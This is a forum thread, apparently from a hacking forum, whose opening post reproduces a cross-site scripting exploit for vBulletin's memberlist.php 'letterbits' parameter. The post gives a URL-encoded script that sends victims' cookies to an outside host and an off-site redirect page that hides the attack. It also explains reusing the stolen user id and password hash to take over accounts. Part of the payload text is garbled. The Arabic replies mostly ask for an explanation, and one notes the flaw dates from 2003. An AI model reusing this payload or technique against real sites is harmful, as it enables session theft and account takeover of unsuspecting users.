Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://vulnerable/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D% 27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3Fcook%3D%27%2B
escape%28document%2E&@#&@#&@#&@#&@#&@#%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2E&@#&@#&@#&@#&@#&@#%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/&@#&@#&@#&@#&@#&@# stealing code, and then to http://www.swgmotu.com.

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------
وسلامتكم:D

ننتظر شرح لها من هاي هكر أو غيرة

ويعطيك الف عافية

شرح بالله ياجماعه

<<<<عليمي الولد

بااااااااايااااااااات

<<<<<<<<< مشيوت من المسنجر ... خخخخخخخخخخخخخخخخخخخخخ

الله يستر لا يكون ايميلي راح فيها !

يالله شخصية تتبرع وتشرح لنا:eek:

thaaaaaaanx alot dude

والله يا جماعه تبغون الصراحه أنا أشوف موضوع الاخ أحس أنه قوي

لكن ما فهمت شي ههههههههههههه

ياليت لو ترجمه فقط

ياخوي ماتشوفون التاريخ :( ؟؟؟ عام 2003 حنا الحين عام 2006 والثغره قديمه ومعروفه وعلى اصدارات قديمه وطلع بعدها ثغرات كثيره اقوى واجد ,, رجاءا لاتردون على مواضيع قديمه ,,,,,,, مغلــــق